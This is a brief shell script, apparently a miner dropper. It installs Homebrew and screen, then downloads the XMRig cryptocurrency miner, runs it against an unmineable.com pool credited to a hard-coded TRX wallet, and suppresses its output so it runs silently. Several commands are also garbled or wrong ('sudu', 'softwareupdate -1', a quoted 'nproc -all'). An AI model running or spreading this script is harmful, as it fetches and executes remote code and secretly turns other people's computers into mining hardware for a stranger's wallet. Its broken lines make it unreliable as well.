#!/bin/sh
softwareupdate -1
ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" < /dev/null 2> /dev/null ; brew install caskroom/cask/brew-cask 2> /dev/null
brew install --cask screen
brew install coreutils
sudo apt update
sudo apt install screen -y
sudu apt-get install python-dev
wget https://github.com/xmrig/xmrig/releases/download/v6.15.0/xmrig-6.15.0-macos-x64.tar.gz && tar -xf xmrig-6.15.0-macos-x64.tar.gz && cd xmrig-6.15.0 && ./xmrig -o rx.unmineable.com:3333 -a rx -k -u TRX:TW1TzENAhmoKhona2UcSzxEfpM9CWAz6Ht.$(echo $(shuf -i 1-9999 -n 1)-PROXY) 'nproc -all' > /dev/null
